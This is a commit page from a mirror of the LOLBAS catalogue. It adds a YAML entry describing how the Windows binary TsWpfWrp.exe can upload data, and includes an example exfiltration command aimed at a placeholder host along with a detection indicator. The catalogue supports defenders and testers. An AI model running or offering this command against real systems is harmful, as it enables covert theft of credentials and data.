public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-02-26 20:13:42 +01:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Avihay Eldad 2024-04-25 14:05:30 +03:00 committed by GitHub
parent fc23c999e6
commit 20ea9d3379
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
yml/OSBinaries/TsWpfWrp.yml Normal file
View File

@ -0,0 +1,24 @@
---
Name: TsWpfWrp.exe
Description: Windows Presentation Foundation Terminal Server Print Wrapper
Author: Avihay Eldad
Created: 2024-04-25
Commands:
- Command: TsWpfWrp.exe http://example.com/ExfilData blabla
Description: Upload file, credentials or data exfiltration in general
Usecase: Exfilitrate data to remote server
Category: Upload
Privileges: User
MitreID: T1567
OperatingSystem: Windows
Full_Path:
- Path: C:\Windows\System32\TsWpfWrp.exe
- Path: C:\Windows\SysWOW64\TsWpfWrp.exe
Detection:
- IOC: TsWpfWrp making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'
- Person: Sagi Dinar
Handle: '@DinarSagi'